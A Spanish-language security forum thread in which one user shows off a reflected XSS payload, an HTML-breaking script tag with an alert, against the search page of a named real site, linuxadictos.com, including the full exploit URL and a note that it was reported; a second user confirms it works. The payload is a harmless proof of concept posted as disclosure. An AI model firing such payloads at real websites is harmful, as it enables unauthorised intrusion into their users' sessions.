Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Manokero en Agosto 06, 2016, 09:01:58 pm

Título: [XSS] linuxadictos.com
Publicado por: Manokero en Agosto 06, 2016, 09:01:58 pm
(https://s7.postimg.org/nu0kgqji3/XSS.png)
Vector:
Código: (html5) You are not allowed to view links. Register or Login
</strong></h3><script >alert("hola")</script><h3><strong>xss: http://www.linuxadictos.com/search/%3C%2Fstrong%3E%3C%2Fh3%3E%3Cscript+%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Ch3%3E%3Cstrong%3E (http://www.linuxadictos.com/search/%3C%2Fstrong%3E%3C%2Fh3%3E%3Cscript+%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Ch3%3E%3Cstrong%3E)
Autor: Manokero
Reportado: Si


Los scripts y etiquetas iframe solo funcionan en firefox, en chrome seria solo html, no se si valga pero espero que si



Título: Re:[XSS] linuxadictos.com
Publicado por: blackdrake en Agosto 08, 2016, 11:27:36 am
You are not allowed to view links. Register or Login
Los scripts y etiquetas iframe solo funcionan en firefox, en chrome seria solo html, no se si valga pero espero que si

Eso es porque chrome lo filtra :P, es totalmente válido.
Saludos.